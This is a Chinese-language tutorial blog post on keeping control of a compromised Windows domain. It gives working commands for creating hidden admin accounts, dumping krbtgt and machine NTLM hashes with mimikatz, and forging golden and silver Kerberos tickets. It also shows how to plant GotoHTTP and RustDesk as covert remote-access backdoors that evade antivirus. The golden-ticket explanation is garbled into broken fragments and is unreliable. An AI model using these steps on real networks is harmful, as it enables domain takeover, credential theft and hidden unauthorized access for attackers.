案例一: 内网域&单机版-权限维持-基于用户-隐藏用户

项目下载地址: GitHub – wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具

用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所以就会导致没办法删除

域环境

域中首先查看用户

利用工具添加隐藏用户的命令

CreateHiddenAccount_upx_v0.2.exe -u jie -p admin!@#45

这个时候查看用户还是没有增加

利用工具-c命令可以查看隐藏用户

CreateHiddenAccount_upx_v0.2.exe -c

在图形界面当中可以查看到

属于administrator用户组

 

尝试能否利用

利用密码建立ipc连接

点击删除是直接可以删除掉的

单机版

添加用户

查看用户

删除的时候删除不了

案例二: 内网域-权限维持-基于服务 TGT-黄金白银票据

黄金票据

⻩⾦
票据

成攻击,是

成有效的
TGT Kerberos
票据,并且不受
TGT

命周期的影响

TGT
默认
10

时,最多续订
7
天),这

可以为任意




⻩⾦
票据,然后为域管理



TGT
,这样普通

户就可以变成域管理员。

 获取域名和sid

whoami    ##获取本地账户
net time /domain   ##获取域名
whoami /all      ##获取sid:S-1-5-21-1218902331-2157346161-1782232778

获取当前域控是啥

需要获取krbtgt用户的hash,这个好像必须得高权限,但是现在做的是权限维持,你已经拿下了域控,不过是利用域控的身份在普通用户里面创建

privilege::debug
lsadump::lsa /patch /user:krbtgt   ##b097d7ed97495408e1537f706c357fc5

创建黄金票据

mimikatz kerberos::golden /user:随便一个用户 /domain:god.org /sid:用户对应的sid /krbtgt:krbtgt用户的hash /ticket:pj

mimikatz kerberos::golden /user:mary /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:pj

把票据导入

kerberos::ptt pj

查看当前的票据

dir查看文件

白银票据

白银票据(
SILVER TICKET
)是利用域的服务账户进行伪造的
ST
,在
Kerberos
认证
的第三步,
Client
带着
ST

Authenticator3

Server
上的某个服务进行请求,
Server
接收到
Client
的请求之后,通过自己的
Master Key
解密
ST
,从而获得
Session Key
。所以只需要知道
Server
用户的
Hash
就可以伪造出一个
ST
,且不会经

KDC
,但是伪造的门票只对部分服务起作用(不需要交互
KDC
,需要知道
Server
NTLM Hash
)。

 首先获取机器用户的hash

privilege::debug
sekurlsa::logonpasswords  ##946d7b4709666cc91a496aa9e834cba8

 导入白银票据,白银票据只能借助服务运行

kerberos::golden /user:jie /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-GOD /service:cifs /rc4:946d7b4709666cc91a496aa9e834cba8 /ptt

kerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash  /ptt

cifs的话是文件共享服务,可以访问

案例三:内网域-权限维持-基于软件-GotoHTTP&RustDesk

GotoHTTP

下载地址:https://gotohttp.com/

gotohttp软件,优点无需安装,占用内存小,并且直接通过网页可以访问

上传以后直接执行会生成一个gotohttp.ini文件里面有访问的地址,以及账号密码

缺点是需要网络,但是内网一般是不出网的

该软件需要走的是https协议,会自动帮你解决免杀问题

一般可以利用cs中直接去查看这个文件

可以直接建立连接

RustDesk

这个程序最大的优点就是可以在内网中不用出网建立连接,并且可以绕过一部分杀毒软件

远程版,也就是需要联网,他的登录的id以及密码在下面的文件中

C:Usersmary.GODAppDataRoamingRustDeskconfigRustDesk.toml

直接输入id号通过密码连接即可

本地版

在下面这个文件中

C:Usersmary.GODAppDataRoamingRustDeskconfigRustDesk2.toml

加入这段数据

direct-server = 'Y'      ##开启IP连接
direct-access-port = '8443' ##端口   

可以在内网中直接不出网建立连接

成功建立连接

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。